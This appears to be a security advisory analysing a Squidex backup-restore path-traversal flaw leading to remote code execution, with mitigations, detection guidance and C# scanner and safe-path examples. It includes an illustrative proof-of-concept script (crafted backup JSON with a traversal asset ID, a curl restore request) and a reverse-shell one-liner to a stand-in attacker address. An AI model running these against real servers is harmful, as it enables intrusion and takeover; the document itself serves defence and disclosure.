Description
Squidex is an open source headless CMS and content management hub. Affected versions are subject to an arbitrary file write vulnerability in the backup restore feature which allows an authenticated attacker to gain remote code execution (RCE).

Squidex allows users with the `squidex.admin.restore` permission to create and restore backups. Part of these backups are the assets uploaded to an App. For each asset, the backup zip archive contains a `.asset` file with the actual content of the asset as well as a related `AssetCreatedEventV2` event, which is stored in a JSON file. Amongst other things, the JSON file contains the event type (`AssetCreatedEventV2`), the ID of the asset (`46c05041-9588-4179-b5eb-ddfcd9463e1e`), its filename (`test.txt`), and its file version (`0`).

When a backup with this event is restored, the `BackupAssets.ReadAssetAsync` method is responsible for re-creating the asset. For this purpose, it determines the name of the `.asset` file in the zip archive, reads its content, and stores the content in the filestore. When the asset is stored in the filestore via the `UploadAsync` method, the `assetId` and `fileVersion` are passed as arguments. These are further passed to the method `GetFileName`, which determines the filename under which the asset is stored. The `assetId` is inserted into the filename without any sanitization, which allows an attacker with `squidex.admin.restore` privileges to write files outside the asset store and, from there, run arbitrary operating system commands on the underlying server (RCE).
EPSS Score: 3%
Comprehensive Technical Analysis of EUVD-2023-50482 (CVE-2023-46253)
Squidex Arbitrary File Write to Remote Code Execution (RCE) Vulnerability
1. Vulnerability Assessment and Severity Evaluation
Vulnerability Overview
EUVD-2023-50482 (CVE-2023-46253) is a critical arbitrary file write vulnerability in Squidex, an open-source headless CMS, leading to Remote Code Execution (RCE). The flaw resides in the backup restore functionality: an authenticated attacker holding the `squidex.admin.restore` permission can place a path traversal sequence in the asset ID of an `AssetCreatedEventV2` event inside a crafted backup, causing the restore job to write attacker-chosen content to an arbitrary path with the privileges of the Squidex process, which can be turned into RCE on the underlying server.
CVSS v3.1 Severity Breakdown
| Metric | Value | Explanation |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely via HTTP(S). |
| Attack Complexity (AC) | Low (L) | No special conditions required; exploitation is straightforward. |
| Privileges Required (PR) | High (H) | Requires squidex.admin.restore permissions. |
| User Interaction (UI) | None (N) | No user interaction needed. |
| Scope (S) | Changed (C) | Impact extends beyond the vulnerable component (RCE on host OS). |
| Confidentiality (C) | High (H) | Full system compromise possible. |
| Integrity (I) | High (H) | Arbitrary file writes allow malicious code execution. |
| Availability (A) | High (H) | Attacker can disrupt services or take over the system. |
| Base Score | 9.1 (Critical) | Aligns with the high-impact nature of RCE vulnerabilities. |
Risk Assessment
- Exploitability: High (authenticated but low-complexity attack).
- Impact: Critical (full system compromise).
- EPSS Score: 3.0% (indicates a moderate likelihood of exploitation in the wild).
- ENISA Classification: High-severity vulnerability requiring immediate patching.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Chain
1. Authentication
   - The attacker needs credentials (or an API client) holding the `squidex.admin.restore` permission, obtained via phishing, credential stuffing, or an insider. This is an administrative permission, which is why the CVSS vector carries PR:H.
   - Unchanged default credentials raise the exploitation risk.
2. Malicious Backup Archive Crafting
   - The attacker builds a backup ZIP containing:
     - A `.asset` file holding the bytes the attacker wants written to disk.
     - A corresponding `AssetCreatedEventV2` event JSON whose asset ID carries a path traversal sequence (e.g., `../../../target/path/payload`).
   - The injected value is the asset ID, not the `fileName` field: `fileName` is metadata and does not influence where the filestore writes.
3. Path Traversal via Unsanitized `assetId`
   - During restore, `BackupAssets.ReadAssetAsync` reads the `.asset` entry and hands it to `UploadAsync` together with the event's `assetId` and `fileVersion`.
   - `GetFileName` builds the destination name from the unsanitized `assetId`, so the traversal sequence escapes the asset store directory.
   - Simplified example event (field names follow the advisory's description; the real backup event envelope differs):
     { "type": "AssetCreatedEventV2", "assetId": "../../../target/path/payload", "fileName": "payload", "fileVersion": 0 }
   - The `.asset` content is written to the traversed location with the privileges of the Squidex process. With the folder-based asset store this is a write to the server's local filesystem; with an object-storage backend it is a write to an arbitrary key in that bucket.
4. Remote Code Execution
   - Squidex is an ASP.NET Core application served by Kestrel; it does not execute PHP or classic ASPX files, so a webshell dropped into a static directory is only written, never run. RCE comes from overwriting something the Squidex process or the host loads or executes (application files, configuration, startup scripts); the advisory does not prescribe a specific target, and the right one depends on the deployment.
   - From code execution as the service account: reverse shell, data exfiltration, lateral movement.
Proof-of-Concept (PoC) Exploitation
A simplified exploitation flow. The archive layout and JSON field names are illustrative (a real Squidex backup has a different internal structure), and the payload bytes must be chosen for the target deployment: Squidex does not execute PHP, so a PHP webshell would only be written, not run.
```bash
# 1. Craft a backup archive whose asset event carries a traversal sequence as the asset ID
printf 'attacker-controlled bytes' > payload.asset
cat > event.json <<'EOF'
{
  "type": "AssetCreatedEventV2",
  "assetId": "../../../../target/path/payload",
  "fileName": "payload",
  "fileVersion": 0
}
EOF
zip malicious_backup.zip payload.asset event.json

# 2. Host the archive where the Squidex server can fetch it: Squidex restores backups
#    from a URL that the server downloads itself, not from a multipart upload
python3 -m http.server 8000 &

# 3. Start a restore job with a token that holds squidex.admin.restore
curl -X POST "https://squidex-instance/api/apps/restore" \
  -H "Authorization: Bearer <ADMIN_TOKEN>" \
  -H "Content-Type: application/json" \
  -d '{"url": "http://attacker-host:8000/malicious_backup.zip", "name": "restored-app"}'

# 4. The payload lands at the traversed path when the restore job processes the event.
#    Turning that write into command execution depends on what the Squidex process
#    or the host loads from the overwritten location.
```
3. Affected Systems and Software Versions
Vulnerable Versions
- Squidex < 7.9.0 (all versions prior to the patch).
- Deployment Models:
- Self-hosted (on-premises/cloud).
- Containerized (Docker/Kubernetes).
- Managed instances (if misconfigured).
Non-Vulnerable Versions
- Squidex ≥ 7.9.0 (patched version).
- Workarounds: Disabling backup restore functionality if patching is not immediately possible.
4. Recommended Mitigation Strategies
Immediate Actions
1. Apply the Patch
   - Upgrade to Squidex 7.9.0 or later immediately.
   - Reference: GitHub Advisory GHSA-phqq-8g7v-3pg5.
2. Temporary Workarounds (if patching is delayed)
   - Disable Backup Restore: remove the `squidex.admin.restore` permission from all users and API clients until the upgrade is done.
   - Network Segmentation: restrict access to the Squidex admin interface and API to trusted IPs. Because restores are started from a URL that the Squidex server downloads itself, also limit the server's outbound HTTP(S) access to approved backup locations.
   - File System Hardening:
     - Run Squidex under a dedicated service account that can write only to the asset store directory and its other designated data directories, not to the application directory (binaries, `appsettings.json`) or to any location the host executes from.
     - Use immutable or read-only mounts for the application directory where possible.
3. Monitoring & Detection
   - Log Analysis: monitor for restore jobs, in particular ones referencing backup URLs that are not your own backup storage.
   - File Integrity Monitoring (FIM): alert on writes outside the asset store directory by the Squidex service account, and on any change to application files.
   - WAF Rules: a rule matching `../` or `..\` in requests will not catch this vector, because the traversal sequence sits inside the archive that the server fetches, not in the HTTP request sent to Squidex. Inspect archive contents or restore logs instead.
Long-Term Hardening
- Least Privilege Principle: grant `squidex.admin.restore` only to the few accounts that actually perform restores.
- Input Validation: validate every value that becomes part of a path. A blocklist such as `Path.GetInvalidFileNameChars()` is weak (on Linux it contains only `/` and NUL, so `..` passes); allowlist the expected shape of an asset ID instead and check that the fully resolved path stays inside the store directory.
- Container Security: run Squidex in a non-root container with a read-only root filesystem and writable mounts only for its data directories.
- Regular Audits: conduct penetration tests and code reviews for similar path-construction flaws.
5. Impact on the European Cybersecurity Landscape
Regulatory & Compliance Implications
- GDPR (Art. 32): Failure to patch may result in non-compliance if RCE leads to data breaches.
- NIS2 Directive: Critical infrastructure operators using Squidex must prioritize patching to avoid penalties.
- ENISA Guidelines: Aligns with ENISA’s vulnerability management best practices (e.g., timely patching, risk assessment).
Threat Landscape
- Targeted Attacks: APT groups may exploit this in supply-chain attacks (e.g., compromising CMS platforms to distribute malware).
- Ransomware Risk: RCE can lead to initial access for ransomware operators (e.g., LockBit, BlackCat).
- Cloud Environments: Misconfigured Squidex instances in AWS/Azure/GCP are high-value targets.
Sector-Specific Risks
| Sector | Risk Level | Potential Impact |
|---|---|---|
| Government | High | Data exfiltration, espionage. |
| Healthcare | Critical | Patient data breaches; GDPR special-category data violations. |
| Finance | High | Fraud, regulatory fines. |
| Media & Publishing | Medium | Defacement, misinformation. |
6. Technical Details for Security Professionals
Root Cause Analysis
- Vulnerable Code Path: `BackupAssets.ReadAssetAsync` → `UploadAsync` → `GetFileName` (in `Squidex.Domain.Apps.Entities.Assets`).
- The `assetId` is interpolated directly into the file name without sanitization. Simplified form of the flaw (not the verbatim Squidex source):
```csharp
public string GetFileName(string assetId, long fileVersion)
{
    return $"{assetId}_{fileVersion}.asset"; // assetId is attacker-controlled and unsanitized
}
```
- An attacker-controlled `assetId` such as `../../../payload` therefore resolves to a location outside the asset store, giving an arbitrary file write.
Exploitation Requirements
- Authentication: valid credentials with the `squidex.admin.restore` permission.
- Network Access: HTTP(S) access to the Squidex API, plus a location from which the Squidex server can download the crafted archive (restores are started from a URL).
- No User Interaction: exploitable via API calls.
Post-Exploitation Scenarios
- Initial Code Execution: overwrite a file that the Squidex process or the host loads or runs (application files, configuration, scripts). PHP/ASPX webshells do not apply: Squidex is ASP.NET Core on Kestrel and serves static files without executing them.
- Reverse Shell: once commands run, e.g. `bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'`.
- Persistence: add a cron job, SSH key, or backdoor user, as far as the service account's privileges allow.
- Lateral Movement: exfiltrate database credentials (e.g. the MongoDB connection string from Squidex's configuration), pivot to other systems.
Detection & Forensics
- Logs to Investigate:
  - Squidex application logs, wherever the deployment ships them (typically stdout in container deployments): restore jobs, their source URLs, and the identity that started them.
  - Reverse proxy / ingress access logs: POST requests to the restore endpoint from unexpected clients.
  - File system audit trails (e.g. `auditd` on Linux): writes by the Squidex service account outside the asset store, and any modification of application files.
- Indicators of Compromise (IoCs):
  - Files written outside the asset store directory by the Squidex service account.
  - `AssetCreatedEventV2` entries in a backup archive whose asset ID is not a GUID or contains `../` or `..\`.
  - Restore jobs referencing backup URLs outside your own backup storage.
  - Outbound connections from the Squidex host to attacker-controlled IPs.
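A scanner for the archive-side indicators listed above, written in C# as an added example (it is not part of Squidex or of the advisory). It assumes that event JSON keys named `assetId` carry the asset ID, as in the page's own payload example (the real backup envelope may use other names, so the traversal check is applied to every string value regardless of key), and that legitimate IDs are GUIDs. The archive it scans is constructed in the code; `BackupScanner` and its methods are hypothetical names.

```csharp
// Added example, not Squidex's own code: scan a backup archive for the IoCs
// above before it is handed to the restore job.
// Assumptions: keys named "assetId" carry the asset id (as in the page's payload
// example; the real envelope may differ) and a legitimate id is a GUID.
using System;
using System.Collections.Generic;
using System.IO;
using System.IO.Compression;
using System.Text.Json;

public static class BackupScanner
{
    public static List<string> Scan(string zipPath)
    {
        var findings = new List<string>();
        using var zip = ZipFile.OpenRead(zipPath);
        foreach (ZipArchiveEntry entry in zip.Entries)
        {
            // Zip-slip: entry names with a ".." segment or an absolute path
            bool dotdot = false;
            foreach (string seg in entry.FullName.Split(new[] { '/', '\\' }))
            {
                if (seg == "..") { dotdot = true; break; }
            }
            if (dotdot || Path.IsPathRooted(entry.FullName))
            {
                findings.Add($"{entry.FullName}: entry name escapes the extraction directory");
            }
            if (!entry.FullName.EndsWith(".json", StringComparison.OrdinalIgnoreCase)) continue;

            try
            {
                using Stream s = entry.Open();
                using JsonDocument doc = JsonDocument.Parse(s);
                Walk(doc.RootElement, entry.FullName, findings);
            }
            catch (JsonException ex)
            {
                findings.Add($"{entry.FullName}: malformed JSON ({ex.Message})");
            }
        }
        return findings;
    }

    // Recursively visit every value; flag non-GUID asset ids and any string
    // carrying a traversal sequence, whatever its key name.
    private static void Walk(JsonElement el, string where, List<string> findings)
    {
        switch (el.ValueKind)
        {
            case JsonValueKind.Object:
                foreach (JsonProperty p in el.EnumerateObject())
                {
                    if (p.Value.ValueKind == JsonValueKind.String)
                    {
                        string v = p.Value.GetString() ?? "";
                        if (p.Name.Equals("assetId", StringComparison.OrdinalIgnoreCase) && !Guid.TryParseExact(v, "D", out _))
                            findings.Add($"{where}: assetId is not a GUID: '{v}'");
                        if (v.Contains("../") || v.Contains("..\\"))
                            findings.Add($"{where}: field '{p.Name}' contains a traversal sequence: '{v}'");
                    }
                    Walk(p.Value, where, findings);
                }
                break;
            case JsonValueKind.Array:
                foreach (JsonElement item in el.EnumerateArray()) Walk(item, where, findings);
                break;
        }
    }

    public static void Main()
    {
        // Constructed sample archive: one benign event, one with the advisory's
        // traversal id, and one entry whose own name escapes the extraction dir.
        string path = Path.Combine(Path.GetTempPath(), "scan-demo.zip");
        File.Delete(path); // ZipArchiveMode.Create refuses to overwrite
        using (var zip = ZipFile.Open(path, ZipArchiveMode.Create))
        {
            Add(zip, "events/1.json", "{\"type\":\"AssetCreatedEventV2\",\"assetId\":\"46c05041-9588-4179-b5eb-ddfcd9463e1e\",\"fileName\":\"test.txt\",\"fileVersion\":0}");
            Add(zip, "events/2.json", "{\"type\":\"AssetCreatedEventV2\",\"assetId\":\"../../../var/tmp/payload\",\"fileName\":\"payload\",\"fileVersion\":0}");
            Add(zip, "../escape.asset", "bytes");
        }

        foreach (string f in Scan(path)) Console.WriteLine(f);
        File.Delete(path);
    }

    private static void Add(ZipArchive zip, string name, string content)
    {
        using StreamWriter w = new StreamWriter(zip.CreateEntry(name).Open());
        w.Write(content);
    }
}
```

Run it with `dotnet run` in a console project on .NET 6 or later; `System.IO.Compression` and `System.Text.Json` ship with the framework. The sample run reports three findings: the `../escape.asset` entry name, the non-GUID `assetId` in `events/2.json`, and the traversal sequence in that same field. A clean archive yields an empty list, which is the gate to require before starting a restore.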
Defensive Coding Recommendations
- Input Validation:
  - Allowlist the asset ID: parse it as a GUID (or whatever shape IDs are guaranteed to have) and reject anything else; do not rely on stripping characters.
  - `Path.GetInvalidFileNameChars()` is a blocklist that differs per OS and does not reject `..`; use it at most as an extra check.
- Secure File Handling:
  - Build paths with `Path.Combine` and then verify that `Path.GetFullPath` of the result still starts with the store's root directory. `Path.Combine` alone does not prevent traversal, and it discards the base directory entirely when the second argument is rooted.
  - Enforce a single allowed directory for asset storage and refuse writes anywhere else.
- Least Privilege:
  - Run Squidex under a dedicated low-privilege user with write access only to its data directories.
  - Use AppArmor/SELinux to restrict file system access.
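The root-cause snippet and the validation advice above, worked through in C# as an added example (this is not Squidex's code). It assumes a folder-based asset store and that a legitimate asset ID is a GUID in the `D` format of the advisory's sample ID; `UnsafeResolve`, `SafeResolve` and the demo paths are hypothetical names.

```csharp
// Added example, not Squidex's own code: the unsafe path construction from the
// root-cause section beside a hardened version.
// Assumptions: the store is a local folder and a legitimate asset id is a GUID.
using System;
using System.IO;

public static class AssetPathDemo
{
    // Unsafe: the id is dropped into the file name unchecked, so an id such as
    // "../../evil" resolves outside the store directory.
    public static string UnsafeResolve(string storeDir, string assetId, long fileVersion)
    {
        return Path.GetFullPath(Path.Combine(storeDir, $"{assetId}_{fileVersion}.asset"));
    }

    // Hardened: allowlist the id's shape first, then verify containment of the
    // fully resolved path. The containment check is defence in depth; it also
    // catches a rooted id, which Path.Combine would accept as the whole path.
    public static string SafeResolve(string storeDir, string assetId, long fileVersion)
    {
        if (!Guid.TryParseExact(assetId, "D", out Guid id))
        {
            throw new ArgumentException($"asset id must be a GUID, got '{assetId}'", nameof(assetId));
        }
        if (fileVersion < 0)
        {
            throw new ArgumentOutOfRangeException(nameof(fileVersion));
        }

        string root = Path.GetFullPath(storeDir).TrimEnd(Path.DirectorySeparatorChar) + Path.DirectorySeparatorChar;
        string full = Path.GetFullPath(Path.Combine(root, $"{id:D}_{fileVersion}.asset"));

        if (!full.StartsWith(root, StringComparison.Ordinal))
        {
            throw new InvalidOperationException($"resolved path '{full}' escapes the asset store");
        }
        return full;
    }

    public static void Main()
    {
        string store = Path.Combine(Path.GetTempPath(), "squidex-assets");
        string[] ids =
        {
            "46c05041-9588-4179-b5eb-ddfcd9463e1e",  // legitimate id from the advisory
            "../../evil",                            // traversal, as in the advisory
            "/etc/cron.d/job",                       // rooted id: Path.Combine drops the store dir
        };

        foreach (string id in ids)
        {
            Console.WriteLine($"id = {id}");
            Console.WriteLine($"  unsafe -> {UnsafeResolve(store, id, 0)}");
            try
            {
                Console.WriteLine($"  safe   -> {SafeResolve(store, id, 0)}");
            }
            catch (Exception ex) when (ex is ArgumentException || ex is InvalidOperationException)
            {
                Console.WriteLine($"  safe   -> rejected: {ex.Message}");
            }
        }
    }
}
```

The unsafe resolver maps `../../evil` to a path two levels above the store and maps the rooted id straight to `/etc/cron.d/job_0.asset`, because `Path.Combine` returns a rooted second argument unchanged. The hardened resolver rejects both at the GUID check; the containment check remains as a second line of defence for any future code path that builds a name from something other than a validated GUID.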
Conclusion
EUVD-2023-50482 (CVE-2023-46253) is a critical RCE vulnerability in Squidex, stemming from unsanitized path handling in the backup restore feature. Given its CVSS 9.1 score and low exploitation complexity, organizations must patch immediately and implement defensive controls to mitigate risk. The vulnerability poses significant threats to European critical infrastructure, particularly in government, healthcare, and finance sectors, and aligns with ENISA’s high-priority vulnerability management guidelines.
Recommended Actions:
- Patch Squidex to ≥7.9.0 without delay.
- Audit user permissions to ensure least privilege.
- Monitor for exploitation attempts via logs and FIM.
- Conduct a post-patch penetration test to verify remediation.
For further details, refer to the GitHub Advisory.